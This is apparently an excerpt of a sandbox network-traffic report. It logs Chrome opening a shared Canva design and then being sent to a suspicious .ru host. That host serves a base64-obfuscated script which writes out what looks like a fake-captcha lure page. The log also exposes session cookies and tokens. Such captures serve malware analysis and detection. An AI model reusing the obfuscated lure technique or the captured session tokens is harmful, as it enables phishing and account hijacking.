                                                                                                                                                                                                                                                    2024-12-19 21:27:51 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 f0 00 00 ff ff ff 00 00 00 21 f9 04 05 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b
                                                                                                                                                                                                                                                    Data Ascii: GIF89a!,D;


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    101192.168.2.44985834.120.195.249443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:51 UTC743OUTPOST /api/6097940/envelope/?sentry_key=2bfedc9d03674aacac8aa2762f22fefd&sentry_version=7&sentry_client=sentry.javascript.browser%2F7.16.0 HTTP/1.1
                                                                                                                                                                                                                                                    Host: o13855.ingest.sentry.io
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    Content-Length: 138
                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Origin: https://www.canva.com
                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    2024-12-19 21:27:51 UTC138OUTData Raw: 7b 7d 0a 7b 22 74 79 70 65 22 3a 22 63 6c 69 65 6e 74 5f 72 65 70 6f 72 74 22 7d 0a 7b 22 74 69 6d 65 73 74 61 6d 70 22 3a 31 37 33 34 36 34 33 36 36 39 2e 35 32 35 2c 22 64 69 73 63 61 72 64 65 64 5f 65 76 65 6e 74 73 22 3a 5b 7b 22 72 65 61 73 6f 6e 22 3a 22 65 76 65 6e 74 5f 70 72 6f 63 65 73 73 6f 72 22 2c 22 63 61 74 65 67 6f 72 79 22 3a 22 65 72 72 6f 72 22 2c 22 71 75 61 6e 74 69 74 79 22 3a 31 7d 5d 7d
                                                                                                                                                                                                                                                    Data Ascii: {}{"type":"client_report"}{"timestamp":1734643669.525,"discarded_events":[{"reason":"event_processor","category":"error","quantity":1}]}
                                                                                                                                                                                                                                                    2024-12-19 21:27:52 UTC530INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:51 GMT
                                                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                                                    vary: origin, access-control-request-method, access-control-request-headers
                                                                                                                                                                                                                                                    access-control-allow-origin: *
                                                                                                                                                                                                                                                    access-control-expose-headers: x-sentry-error,x-sentry-rate-limits,retry-after
                                                                                                                                                                                                                                                    cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                    Via: 1.1 google
                                                                                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                    2024-12-19 21:27:52 UTC12INData Raw: 32 0d 0a 7b 7d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: 2{}0


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    102192.168.2.44985718.161.69.117443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:52 UTC795OUTGET /p2?c1=2&c2=34402982&ns_type=hidden&ns_event=page_view&c6=canva-aad9e5ad-3a29-42d3-a4e3-b2a423a0bfe7&c7=&c9=&c8=&gtmcb=1610630260 HTTP/1.1
                                                                                                                                                                                                                                                    Host: sb.scorecardresearch.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    Cookie: UID=13Dfb7d508bf078883371d51734643670; XID=13Dfb7d508bf078883371d51734643670
                                                                                                                                                                                                                                                    2024-12-19 21:27:52 UTC363INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Content-Type: image/gif
                                                                                                                                                                                                                                                    Content-Length: 43
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:52 GMT
                                                                                                                                                                                                                                                    Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                                                                                                    X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                    Via: 1.1 154746f00d2b5f8e2d55aa83bf3cce1a.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                    X-Amz-Cf-Pop: DXB52-P1
                                                                                                                                                                                                                                                    X-Amz-Cf-Id: 4WdFDl30VzW8fCNoHxF_VCYR5FS9yYPe2FRNNt-UARNj8lEKoE39rg==
                                                                                                                                                                                                                                                    2024-12-19 21:27:52 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 ff ff ff 00 00 00 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b
                                                                                                                                                                                                                                                    Data Ascii: GIF89a!,D;


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    103192.168.2.449861104.16.103.112443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:52 UTC2878OUTPOST /cdn-cgi/rum? HTTP/1.1
                                                                                                                                                                                                                                                    Host: www.canva.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    Content-Length: 1130
                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                    sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Origin: https://www.canva.com
                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                    Referer: https://www.canva.com/design/DAGZxEJMIA0/pFi0b1a1Y78oAGDuII8Hjg/view?utm_content=DAGZxEJMIA0&utm_campaign=designshare&utm_medium=link2&utm_source=uniquelinks&utlId=hdcdec8ed4a
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    Cookie: CDI=04b60d8a-0afb-4ec1-9086-045d7e0ec7dd; CPA=cnvanTz1hOxPVUJgop6_IlmuWwa-NtyfWx2O1ceJGGLF020n1ZV1iKl7wwDbWBY1Z5UjC1zWarjFNtvOsTB9ze88FeebuPUzY_v79VpdqxDEtzLk9WJhLeSQQjH7JN6qNs-Wtc6o7zrq2JaxSKJ8fHuCDlyVjZdk-rMvs92E0iCq3Z4e_Ddaw8ql5C7MfUKyYgGsGiVJjn3AbdJRGWNuAOZuRWS1q9P0RyLvZo6y3BpPPawIZcZBR6IG9jF176jVnVHy8rFl75lXO4qS_AEGcl534B5JhWxjJqIBv8qqSSKzICruOChEyLtZQbqiZYNoH_EsNTC2n3egVJXzYG-VSbcKWyiEOPkya2G12OS0p-zdBS6xGrr1f720lFYes8MQuJrJu7esh07zUdQtvmvxWQR1vWUuxrmnxfZZMFEwzJPOQXZL6A7VX3oRNQCb1Kzf0dJnvmOj6qoLIrdZzZXvRU96Dlzm6I9fzkJh0nMUj609KEEKP28z8jIw5ITGlSaSLeAalv51mKABcq9K8DNq1VX_wz7_VcUr_Sjqabe-VYjoRVD1Z4JInkjYHE6xUUNellFfFr9r3Bw15690698; CCK=a_O3O23kihyJVif7Fk2gFQ; __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000; ASI=01JFGD2YV02D5APP1T8YZ7689M; gtm_fpc_engagement_event={"url":"https://www.canva.com/design/DAGZxEJ [TRUNCATED]
                                                                                                                                                                                                                                                    2024-12-19 21:27:52 UTC1130OUTData Raw: 7b 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 65 76 65 6e 74 54 79 70 65 22 3a 33 2c 22 76 65 72 73 69 6f 6e 73 22 3a 7b 22 6a 73 22 3a 22 32 30 32 34 2e 36 2e 31 22 2c 22 66 6c 22 3a 22 32 30 32 34 2e 31 30 2e 35 22 7d 2c 22 70 61 67 65 6c 6f 61 64 49 64 22 3a 22 33 30 34 66 34 61 32 62 2d 63 35 31 35 2d 34 61 65 33 2d 39 64 66 37 2d 61 34 33 31 36 31 30 37 39 33 63 33 22 2c 22 6c 6f 63 61 74 69 6f 6e 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 61 6e 76 61 2e 63 6f 6d 2f 64 65 73 69 67 6e 2f 44 41 47 5a 78 45 4a 4d 49 41 30 2f 70 46 69 30 62 31 61 31 59 37 38 6f 41 47 44 75 49 49 38 48 6a 67 2f 76 69 65 77 22 2c 22 6c 61 6e 64 69 6e 67 50 61 74 68 22 3a 22 2f 64 65 73 69 67 6e 2f 44 41 47 5a 78 45 4a 4d 49 41 30 2f 70 46 69 30 62 31 61 31 59 37 38
                                                                                                                                                                                                                                                    Data Ascii: {"referrer":"","eventType":3,"versions":{"js":"2024.6.1","fl":"2024.10.5"},"pageloadId":"304f4a2b-c515-4ae3-9df7-a431610793c3","location":"https://www.canva.com/design/DAGZxEJMIA0/pFi0b1a1Y78oAGDuII8Hjg/view","landingPath":"/design/DAGZxEJMIA0/pFi0b1a1Y78
                                                                                                                                                                                                                                                    2024-12-19 21:27:52 UTC370INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:52 GMT
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    access-control-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                    access-control-allow-methods: POST,OPTIONS
                                                                                                                                                                                                                                                    access-control-max-age: 86400
                                                                                                                                                                                                                                                    vary: Origin
                                                                                                                                                                                                                                                    access-control-allow-credentials: true
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8f4a7aa9cac341e0-EWR
                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    104192.168.2.449862104.16.102.112443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:52 UTC1977OUTGET /_ajax/ae/createBatch HTTP/1.1
                                                                                                                                                                                                                                                    Host: www.canva.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    Cookie: CDI=04b60d8a-0afb-4ec1-9086-045d7e0ec7dd; CPA=cnvanTz1hOxPVUJgop6_IlmuWwa-NtyfWx2O1ceJGGLF020n1ZV1iKl7wwDbWBY1Z5UjC1zWarjFNtvOsTB9ze88FeebuPUzY_v79VpdqxDEtzLk9WJhLeSQQjH7JN6qNs-Wtc6o7zrq2JaxSKJ8fHuCDlyVjZdk-rMvs92E0iCq3Z4e_Ddaw8ql5C7MfUKyYgGsGiVJjn3AbdJRGWNuAOZuRWS1q9P0RyLvZo6y3BpPPawIZcZBR6IG9jF176jVnVHy8rFl75lXO4qS_AEGcl534B5JhWxjJqIBv8qqSSKzICruOChEyLtZQbqiZYNoH_EsNTC2n3egVJXzYG-VSbcKWyiEOPkya2G12OS0p-zdBS6xGrr1f720lFYes8MQuJrJu7esh07zUdQtvmvxWQR1vWUuxrmnxfZZMFEwzJPOQXZL6A7VX3oRNQCb1Kzf0dJnvmOj6qoLIrdZzZXvRU96Dlzm6I9fzkJh0nMUj609KEEKP28z8jIw5ITGlSaSLeAalv51mKABcq9K8DNq1VX_wz7_VcUr_Sjqabe-VYjoRVD1Z4JInkjYHE6xUUNellFfFr9r3Bw15690698; CCK=a_O3O23kihyJVif7Fk2gFQ; __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000; ASI=01JFGD2YV02D5APP1T8YZ7689M; gtm_fpc_engagement_event={"url":"https://www.canva.com/design/DAGZxEJ [TRUNCATED]
                                                                                                                                                                                                                                                    2024-12-19 21:27:52 UTC1069INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:52 GMT
                                                                                                                                                                                                                                                    Content-Type: text/javascript;charset=utf-8
                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    CF-Ray: 8f4a7aaa8c6c43fb-EWR
                                                                                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                    Cache-Control: no-cache, no-store
                                                                                                                                                                                                                                                    Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                    Pragma: No-cache
                                                                                                                                                                                                                                                    accept-ch: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                    content-security-policy: frame-ancestors https://canvateam.zendesk.com https://phoenix.canva.com https://www.canva-iris.com;
                                                                                                                                                                                                                                                    referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                                                                                                                                    x-frame-options: deny
                                                                                                                                                                                                                                                    x-request-id: 8f4a7aaa8c6c43fb
                                                                                                                                                                                                                                                    x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JiO4JEVmGjDI%2BPlRwUWq94yh6JHz166FQ2AXb6mfMqRn7vc2HTHMcnuP4L1mgak7DD%2FWCY06FqfIhskduJrO8E6Lu97fOk0xVgI0SnmQeM29jrOOvfQi8C5wPCaRDMk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    2024-12-19 21:27:52 UTC64INData Raw: 33 61 0d 0a 27 22 5d 29 7d 77 68 69 6c 65 28 31 29 3b 3c 2f 78 3e 2f 2f 7b 22 73 74 61 74 75 73 43 6f 64 65 22 3a 34 30 34 2c 22 65 72 72 6f 72 22 3a 22 6e 6f 74 20 66 6f 75 6e 64 22 7d 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: 3a'"])}while(1);</x>//{"statusCode":404,"error":"not found"}
                                                                                                                                                                                                                                                    2024-12-19 21:27:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    105192.168.2.449864172.67.176.26443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:53 UTC708OUTGET /z9yaFIg/ HTTP/1.1
                                                                                                                                                                                                                                                    Host: 58ts.vomlogsffy.ru
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                    Sec-Fetch-User: ?1
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    2024-12-19 21:27:54 UTC1254INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:54 GMT
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: no-cache, private
                                                                                                                                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                    vary: accept-encoding
                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SiRNQtAT0ELX23GeXhpiQhqfdH3N1q7HrK9tJpGqugAmrUKWqaI%2BznVQluL0bJh48QfiiTk5cCdlRFsc1hDrJdQZMSL9WNj13EGQ%2BD702VIr7npAsufoekBHgFonig%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=197953&min_rtt=5520&rtt_var=50392&sent=782&recv=414&lost=0&retrans=5&sent_bytes=908263&recv_bytes=48253&delivery_rate=1602400&cwnd=378&unsent_bytes=0&cid=4c1f618ab8fa6a00&ts=714964&x=0"
                                                                                                                                                                                                                                                    Set-Cookie: XSRF-TOKEN=eyJpdiI6ImZlYUhxLzV0VlZpc3VtNEtFdmM1TUE9PSIsInZhbHVlIjoia1N5MkNRb3ZxNkJLL3phWUdhOUdWMGFOUGpSUkErS3JDOWszUys1eEpISTdZb0E0UGdmck9KSFNGRXY0c0xZaG5iOXZSWktuVG10d2J4elI0ajIrSmJGZ2hUdDIwbzlwQ21La05qdnhrT2xXU3lrTG4xR1ZSSXMyS1pqcDVOWUYiLCJtYWMiOiIyMzBlNGNiMDA3ZDkwMjM0ZjE4MGE0MGIzODMzMDUzZTViYWY0Nzg5NDcxOGUxM2U5MjU0OWVhZDBjOGVlNDVkIiwidGFnIjoiIn0%3D; expires=Thu, 19-Dec-2024 23:27:53 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                                                                                                                                                                                                    2024-12-19 21:27:54 UTC733INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6a 4e 33 55 6b 46 50 52 58 6c 4e 64 57 39 70 64 30 51 33 61 47 68 48 57 47 4a 34 4e 6c 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 52 55 68 49 59 31 68 6a 57 44 46 4a 56 31 63 7a 56 55 4a 76 51 33 4e 4e 54 57 51 33 59 6d 52 7a 64 55 46 50 4d 6e 70 50 64 47 52 50 4e 48 68 76 64 44 4e 70 56 31 4e 50 4d 30 35 75 5a 45 70 6e 63 44 4a 45 63 6c 6c 48 5a 6d 63 34 4d 6b 6b 78 5a 6b 68 76 65 6a 6c 6f 4b 30 74 76 54 7a 46 53 52 79 74 55 4f 45 68 49 64 44 6c 4c 55 54 4a 45 59 58 4a 4e 4b 33 46 76 65 44 64 42 63 6d 4a 70 52 56 5a 74 57 6c 56 4d 4c 33 42 42 65 44 52 57 4d 31 67 7a 51 55 46 77 55 31 4e 57 4f 47 35 42 61 31 70 73 57 54 5a 68 54 55 49
                                                                                                                                                                                                                                                    Data Ascii: Set-Cookie: laravel_session=eyJpdiI6IjN3UkFPRXlNdW9pd0Q3aGhHWGJ4NlE9PSIsInZhbHVlIjoiRUhIY1hjWDFJV1czVUJvQ3NNTWQ3YmRzdUFPMnpPdGRPNHhvdDNpV1NPM05uZEpncDJEcllHZmc4MkkxZkhvejloK0tvTzFSRytUOEhIdDlLUTJEYXJNK3FveDdBcmJpRVZtWlVML3BBeDRWM1gzQUFwU1NWOG5Ba1psWTZhTUI
                                                                                                                                                                                                                                                    2024-12-19 21:27:54 UTC1369INData Raw: 32 33 32 38 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 2f 2a 20 44 6f 6e 26 23 30 33 39 3b 74 20 77 61 74 63 68 20 74 68 65 20 63 6c 6f 63 6b 3b 20 64 6f 20 77 68 61 74 20 69 74 20 64 6f 65 73 2e 20 4b 65 65 70 20 67 6f 69 6e 67 2e 20 2a 2f 0d 0a 69 66 28 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 38 31 4f 46 52 7a 4c 6e 5a 76 62 57 78 76 5a 33 4e 6d 5a 6e 6b 75 63 6e 55 76 65 6a 6c 35 59 55 5a 4a 5a 79 38 3d 22 29 20 3d 3d 20 22 6e 6f 6d 61 74 63 68 22 29 7b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f 62 28 27 50 43 46 45 54 30 4e 55 57 56 42 46 49 47 68 30 62 57 77 2b 44 51 6f 38 61 48 52 74 62 43 42 73 59 57 35 6e 50 53 4a 6c 62 69 49 2b 44 51 6f 38 61 47 56 68
                                                                                                                                                                                                                                                    Data Ascii: 2328<script>/* Don&#039;t watch the clock; do what it does. Keep going. */if(atob("aHR0cHM6Ly81OFRzLnZvbWxvZ3NmZnkucnUvejl5YUZJZy8=") == "nomatch"){document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVh
                                                                                                                                                                                                                                                    2024-12-19 21:27:54 UTC1369INData Raw: 45 37 44 51 6f 67 49 43 41 67 5a 47 6c 7a 63 47 78 68 65 54 6f 67 5a 6d 78 6c 65 44 73 4e 43 69 41 67 49 43 42 71 64 58 4e 30 61 57 5a 35 4c 57 4e 76 62 6e 52 6c 62 6e 51 36 49 47 4e 6c 62 6e 52 6c 63 6a 73 4e 43 69 41 67 49 43 42 68 62 47 6c 6e 62 69 31 70 64 47 56 74 63 7a 6f 67 59 32 56 75 64 47 56 79 4f 77 30 4b 49 43 41 67 49 47 68 6c 61 57 64 6f 64 44 6f 67 4d 54 41 77 4a 54 73 4e 43 69 41 67 49 43 42 6a 62 32 78 76 63 6a 6f 67 64 32 68 70 64 47 55 37 44 51 6f 67 49 43 41 67 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 69 41 79 4e 48 42 34 4f 77 30 4b 49 43 41 67 49 48 52 6c 65 48 51 74 59 57 78 70 5a 32 34 36 49 47 4e 6c 62 6e 52 6c 63 6a 73 4e 43 6e 30 4e 43 69 35 6a 59 58 42 30 59 32 68 68 4c 57 4a 76 65 43 42 37 44 51 6f 67 49 43 41 67 5a 47 6c 7a 63
                                                                                                                                                                                                                                                    Data Ascii: E7DQogICAgZGlzcGxheTogZmxleDsNCiAgICBqdXN0aWZ5LWNvbnRlbnQ6IGNlbnRlcjsNCiAgICBhbGlnbi1pdGVtczogY2VudGVyOw0KICAgIGhlaWdodDogMTAwJTsNCiAgICBjb2xvcjogd2hpdGU7DQogICAgZm9udC1zaXplOiAyNHB4Ow0KICAgIHRleHQtYWxpZ246IGNlbnRlcjsNCn0NCi5jYXB0Y2hhLWJveCB7DQogICAgZGlzc
                                                                                                                                                                                                                                                    2024-12-19 21:27:54 UTC1369INData Raw: 74 59 32 68 6c 59 32 74 69 62 33 67 67 61 57 35 77 64 58 52 62 64 48 6c 77 5a 54 30 69 59 32 68 6c 59 32 74 69 62 33 67 69 58 54 70 6a 61 47 56 6a 61 32 56 6b 49 43 73 67 62 47 46 69 5a 57 77 67 4c 6d 4e 68 63 48 52 6a 61 47 45 74 59 32 68 6c 59 32 74 74 59 58 4a 72 4f 6a 70 68 5a 6e 52 6c 63 69 42 37 44 51 6f 67 49 43 41 67 59 32 39 75 64 47 56 75 64 44 6f 67 49 69 49 37 44 51 6f 67 49 43 41 67 63 47 39 7a 61 58 52 70 62 32 34 36 49 47 46 69 63 32 39 73 64 58 52 6c 4f 77 30 4b 49 43 41 67 49 47 78 6c 5a 6e 51 36 49 44 56 77 65 44 73 4e 43 69 41 67 49 43 42 30 62 33 41 36 49 44 46 77 65 44 73 4e 43 69 41 67 49 43 42 33 61 57 52 30 61 44 6f 67 4e 6e 42 34 4f 77 30 4b 49 43 41 67 49 47 68 6c 61 57 64 6f 64 44 6f 67 4d 54 4a 77 65 44 73 4e 43 69 41 67 49 43
                                                                                                                                                                                                                                                    Data Ascii: tY2hlY2tib3ggaW5wdXRbdHlwZT0iY2hlY2tib3giXTpjaGVja2VkICsgbGFiZWwgLmNhcHRjaGEtY2hlY2ttYXJrOjphZnRlciB7DQogICAgY29udGVudDogIiI7DQogICAgcG9zaXRpb246IGFic29sdXRlOw0KICAgIGxlZnQ6IDVweDsNCiAgICB0b3A6IDFweDsNCiAgICB3aWR0aDogNnB4Ow0KICAgIGhlaWdodDogMTJweDsNCiAgIC
